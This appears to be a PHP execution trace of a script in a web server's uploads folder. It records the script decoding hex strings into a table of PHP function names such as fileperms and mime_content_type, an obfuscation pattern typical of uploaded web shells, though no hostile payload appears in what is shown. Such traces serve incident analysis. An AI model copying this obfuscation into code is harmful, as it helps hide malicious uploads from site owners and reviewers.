2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1102	0	0.042078	721792	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1102	1	0.042099	721840
3	1102	R			116
3	1103	0	0.042125	721760	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1103	1	0.042147	721800
3	1103	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1104	0	0.042206	721792	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	1104	1	0.042226	721840
3	1104	R			105
3	1105	0	0.042251	721760	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	1105	1	0.042271	721800
3	1105	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1106	0	0.042330	721792	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	1106	1	0.042352	721840
3	1106	R			109
3	1107	0	0.042386	721760	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	1107	1	0.042407	721800
3	1107	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1108	0	0.042466	721800	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1108	1	0.042488	721848
3	1108	R			101
3	1109	0	0.042511	721768	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1109	1	0.042532	721808
3	1109	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1110	0	0.042602	721800	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'7a'
3	1110	1	0.042622	721848
3	1110	R			122
3	1111	0	0.042642	721768	chr	0		/var/www/html/uploads/lCT.php	204	1	122
3	1111	1	0.042659	721808
3	1111	R			'z'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'z'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1112	0	0.042697	721800	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	1112	1	0.042708	721848
3	1112	R			111
3	1113	0	0.042721	721768	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	1113	1	0.042732	721808
3	1113	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1114	0	0.042762	721800	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	1114	1	0.042774	721848
3	1114	R			110
3	1115	0	0.042786	721768	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	1115	1	0.042797	721808
3	1115	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1116	0	0.042827	721800	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1116	1	0.042839	721848
3	1116	R			101
3	1117	0	0.042852	721768	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1117	1	0.042863	721808
3	1117	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1118	0	0.042893	721800	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	1118	1	0.042905	721848
3	1118	R			95
3	1119	0	0.042917	721768	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	1119	1	0.042928	721808
3	1119	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1120	0	0.042958	721800	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1120	1	0.042969	721848
3	1120	R			115
3	1121	0	0.042982	721768	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1121	1	0.042993	721808
3	1121	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1122	0	0.043023	721800	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1122	1	0.043034	721848
3	1122	R			101
3	1123	0	0.043047	721768	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1123	1	0.043059	721808
3	1123	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1124	0	0.043089	721808	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1124	1	0.043100	721856
3	1124	R			116
3	1125	0	0.043113	721776	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1125	1	0.043124	721816
3	1125	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1075	1	0.043155	721776
2	1075	R			'date_default_timezone_set'
1		A						/var/www/html/uploads/lCT.php	7	$func[53] = 'date_default_timezone_set'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1126	0	0.043193	721776	dehex	1		/var/www/html/uploads/lCT.php	7	1	'666c757368'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 9
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1127	0	0.043234	721808	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	1127	1	0.043246	721856
3	1127	R			102
3	1128	0	0.043259	721776	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	1128	1	0.043271	721816
3	1128	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1129	0	0.043301	721840	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	1129	1	0.043312	721888
3	1129	R			108
3	1130	0	0.043325	721808	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	1130	1	0.043342	721848
3	1130	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1131	0	0.043373	721840	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'75'
3	1131	1	0.043385	721888
3	1131	R			117
3	1132	0	0.043398	721808	chr	0		/var/www/html/uploads/lCT.php	204	1	117
3	1132	1	0.043408	721848
3	1132	R			'u'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1133	0	0.043438	721840	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1133	1	0.043450	721888
3	1133	R			115
3	1134	0	0.043463	721808	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1134	1	0.043474	721848
3	1134	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1135	0	0.043504	721840	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'68'
3	1135	1	0.043516	721888
3	1135	R			104
3	1136	0	0.043528	721808	chr	0		/var/www/html/uploads/lCT.php	204	1	104
3	1136	1	0.043539	721848
3	1136	R			'h'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1126	1	0.043570	721808
2	1126	R			'flush'
1		A						/var/www/html/uploads/lCT.php	7	$func[54] = 'flush'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1137	0	0.043603	721808	dehex	1		/var/www/html/uploads/lCT.php	7	1	'7374726c656e'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 11
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1138	0	0.043644	721840	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1138	1	0.043656	721888
3	1138	R			115
3	1139	0	0.043669	721808	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1139	1	0.043680	721848
3	1139	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1140	0	0.043710	721872	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1140	1	0.043721	721920
3	1140	R			116
3	1141	0	0.043734	721840	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1141	1	0.043745	721880
3	1141	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1142	0	0.043775	721872	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	1142	1	0.043787	721920
3	1142	R			114
3	1143	0	0.043800	721840	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	1143	1	0.043810	721880
3	1143	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1144	0	0.043840	721872	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	1144	1	0.043852	721920
3	1144	R			108
3	1145	0	0.043865	721840	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	1145	1	0.043876	721880
3	1145	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1146	0	0.043907	721872	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1146	1	0.043918	721920
3	1146	R			101
3	1147	0	0.043930	721840	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1147	1	0.043942	721880
3	1147	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1148	0	0.043972	721872	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	1148	1	0.043983	721920
3	1148	R			110
3	1149	0	0.043996	721840	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	1149	1	0.044007	721880
3	1149	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1137	1	0.044037	721840
2	1137	R			'strlen'
1		A						/var/www/html/uploads/lCT.php	7	$func[55] = 'strlen'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1150	0	0.044074	721840	dehex	1		/var/www/html/uploads/lCT.php	7	1	'7472696d'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 7
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1151	0	0.044114	721872	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1151	1	0.044126	721920
3	1151	R			116
3	1152	0	0.044139	721840	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1152	1	0.044150	721880
3	1152	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1153	0	0.044180	721904	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	1153	1	0.044191	721952
3	1153	R			114
3	1154	0	0.044204	721872	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	1154	1	0.044216	721912
3	1154	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1155	0	0.044246	721904	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	1155	1	0.044257	721952
3	1155	R			105
3	1156	0	0.044270	721872	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	1156	1	0.044281	721912
3	1156	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1157	0	0.044312	721904	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	1157	1	0.044323	721952
3	1157	R			109
3	1158	0	0.044335	721872	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	1158	1	0.044347	721912
3	1158	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1150	1	0.044377	721872
2	1150	R			'trim'
1		A						/var/www/html/uploads/lCT.php	7	$func[56] = 'trim'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1159	0	0.044410	721872	dehex	1		/var/www/html/uploads/lCT.php	7	1	'656d707479'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 9
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1160	0	0.044451	721904	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1160	1	0.044462	721952
3	1160	R			101
3	1161	0	0.044475	721872	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1161	1	0.044486	721912
3	1161	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1162	0	0.044517	721936	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	1162	1	0.044528	721984
3	1162	R			109
3	1163	0	0.044541	721904	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	1163	1	0.044552	721944
3	1163	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1164	0	0.044582	721936	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	1164	1	0.044593	721984
3	1164	R			112
3	1165	0	0.044606	721904	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	1165	1	0.044617	721944
3	1165	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1166	0	0.044647	721936	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1166	1	0.044658	721984
3	1166	R			116
3	1167	0	0.044671	721904	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1167	1	0.044682	721944
3	1167	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1168	0	0.044712	721936	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'79'
3	1168	1	0.044723	721984
3	1168	R			121
3	1169	0	0.044736	721904	chr	0		/var/www/html/uploads/lCT.php	204	1	121
3	1169	1	0.044747	721944
3	1169	R			'y'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'y'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1159	1	0.044777	721904
2	1159	R			'empty'
1		A						/var/www/html/uploads/lCT.php	7	$func[57] = 'empty'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1170	0	0.044815	721904	dehex	1		/var/www/html/uploads/lCT.php	7	1	'6973736574'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 9
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1171	0	0.044855	721936	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	1171	1	0.044867	721984
3	1171	R			105
3	1172	0	0.044880	721904	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	1172	1	0.044890	721944
3	1172	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1173	0	0.044921	721968	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1173	1	0.044933	722016
3	1173	R			115
3	1174	0	0.044945	721936	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1174	1	0.044956	721976
3	1174	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1175	0	0.044987	721968	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1175	1	0.044998	722016
3	1175	R			115
3	1176	0	0.045011	721936	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1176	1	0.045022	721976
3	1176	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1177	0	0.045051	721968	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1177	1	0.045062	722016
3	1177	R			101
3	1178	0	0.045074	721936	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1178	1	0.045086	721976
3	1178	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1179	0	0.045119	721968	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1179	1	0.045131	722016
3	1179	R			116
3	1180	0	0.045143	721936	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1180	1	0.045174	721976
3	1180	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1170	1	0.045207	721936
2	1170	R			'isset'
1		A						/var/www/html/uploads/lCT.php	7	$func[58] = 'isset'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1181	0	0.045241	721936	dehex	1		/var/www/html/uploads/lCT.php	7	1	'66696c657065726d73'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 17
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1182	0	0.045282	721968	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	1182	1	0.045294	722016
3	1182	R			102
3	1183	0	0.045307	721936	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	1183	1	0.045318	721976
3	1183	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1184	0	0.045349	722000	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	1184	1	0.045360	722048
3	1184	R			105
3	1185	0	0.045373	721968	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	1185	1	0.045384	722008
3	1185	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1186	0	0.045415	722000	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	1186	1	0.045426	722048
3	1186	R			108
3	1187	0	0.045439	721968	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	1187	1	0.045450	722008
3	1187	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1188	0	0.045481	722000	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1188	1	0.045493	722048
3	1188	R			101
3	1189	0	0.045505	721968	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1189	1	0.045517	722008
3	1189	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1190	0	0.045550	722000	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	1190	1	0.045562	722048
3	1190	R			112
3	1191	0	0.045575	721968	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	1191	1	0.045586	722008
3	1191	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1192	0	0.045616	722000	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1192	1	0.045628	722048
3	1192	R			101
3	1193	0	0.045641	721968	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1193	1	0.045652	722008
3	1193	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1194	0	0.045682	722000	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	1194	1	0.045694	722048
3	1194	R			114
3	1195	0	0.045707	721968	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	1195	1	0.045720	722008
3	1195	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1196	0	0.045761	722000	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	1196	1	0.045776	722048
3	1196	R			109
3	1197	0	0.045789	721968	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	1197	1	0.045800	722008
3	1197	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1198	0	0.045831	722008	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1198	1	0.045842	722056
3	1198	R			115
3	1199	0	0.045854	721976	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1199	1	0.045865	722016
3	1199	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1181	1	0.045896	721976
2	1181	R			'fileperms'
1		A						/var/www/html/uploads/lCT.php	7	$func[59] = 'fileperms'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1200	0	0.045930	721976	dehex	1		/var/www/html/uploads/lCT.php	7	1	'7374726c656e'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 11
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1201	0	0.045971	722008	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	1201	1	0.045983	722056
3	1201	R			115
3	1202	0	0.045996	721976	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	1202	1	0.046007	722016
3	1202	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1203	0	0.046038	722040	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1203	1	0.046050	722088
3	1203	R			116
3	1204	0	0.046063	722008	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1204	1	0.046074	722048
3	1204	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1205	0	0.046105	722040	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	1205	1	0.046116	722088
3	1205	R			114
3	1206	0	0.046129	722008	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	1206	1	0.046140	722048
3	1206	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1207	0	0.046171	722040	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	1207	1	0.046183	722088
3	1207	R			108
3	1208	0	0.046195	722008	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	1208	1	0.046206	722048
3	1208	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1209	0	0.046236	722040	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	1209	1	0.046247	722088
3	1209	R			101
3	1210	0	0.046260	722008	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	1210	1	0.046271	722048
3	1210	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1211	0	0.046307	722040	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	1211	1	0.046319	722088
3	1211	R			110
3	1212	0	0.046331	722008	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	1212	1	0.046343	722048
3	1212	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1200	1	0.046373	722008
2	1200	R			'strlen'
1		A						/var/www/html/uploads/lCT.php	7	$func[60] = 'strlen'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1213	0	0.046412	722008	dehex	1		/var/www/html/uploads/lCT.php	7	1	'636f756e74'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 9
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1214	0	0.046452	722040	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	1214	1	0.046463	722088
3	1214	R			99
3	1215	0	0.046476	722008	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	1215	1	0.046487	722048
3	1215	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1216	0	0.046518	722072	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	1216	1	0.046530	722120
3	1216	R			111
3	1217	0	0.046542	722040	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	1217	1	0.046554	722080
3	1217	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1218	0	0.046585	722072	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'75'
3	1218	1	0.046596	722120
3	1218	R			117
3	1219	0	0.046609	722040	chr	0		/var/www/html/uploads/lCT.php	204	1	117
3	1219	1	0.046619	722080
3	1219	R			'u'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1220	0	0.046650	722072	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	1220	1	0.046661	722120
3	1220	R			110
3	1221	0	0.046674	722040	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	1221	1	0.046685	722080
3	1221	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1222	0	0.046715	722072	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	1222	1	0.046727	722120
3	1222	R			116
3	1223	0	0.046739	722040	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	1223	1	0.046750	722080
3	1223	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1213	1	0.046781	722040
2	1213	R			'count'
1		A						/var/www/html/uploads/lCT.php	7	$func[61] = 'count'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1224	0	0.046814	722040	dehex	1		/var/www/html/uploads/lCT.php	7	1	'726f756e64'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 9
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1225	0	0.046853	722072	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	1225	1	0.046865	722120
3	1225	R			114
3	1226	0	0.046878	722040	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	1226	1	0.046889	722080
3	1226	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1227	0	0.046920	722104	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	1227	1	0.046931	722152
3	1227	R			111
3	1228	0	0.046944	722072	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	1228	1	0.046955	722112
3	1228	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1229	0	0.046986	722104	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'75'
3	1229	1	0.046997	722152
3	1229	R			117
3	1230	0	0.047009	722072	chr	0		/var/www/html/uploads/lCT.php	204	1	117
3	1230	1	0.047020	722112
3	1230	R			'u'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1231	0	0.047056	722104	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	1231	1	0.047067	722152
3	1231	R			110
3	1232	0	0.047079	722072	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	1232	1	0.047091	722112
3	1232	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	1233	0	0.047121	722104	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	1233	1	0.047133	722152
3	1233	R			100
3	1234	0	0.047145	722072	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	1234	1	0.047157	722112
3	1234	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	1224	1	0.047187	722072
2	1224	R			'round'
1		A						/var/www/html/uploads/lCT.php	7	$func[62] = 'round'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	1235	0	0.047220	722072	dehex	1		/var/www/html/uploads/lCT.php	7	1	'6d696d655f636f6e74656e745f74797065'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 33
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	1236	0	0.047261	722104	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	1236	1	0.047273	722152
3	1236	R			109
3	1237	0	0.047286	722072	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	1237	1	0.047298	722112
3	1237	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
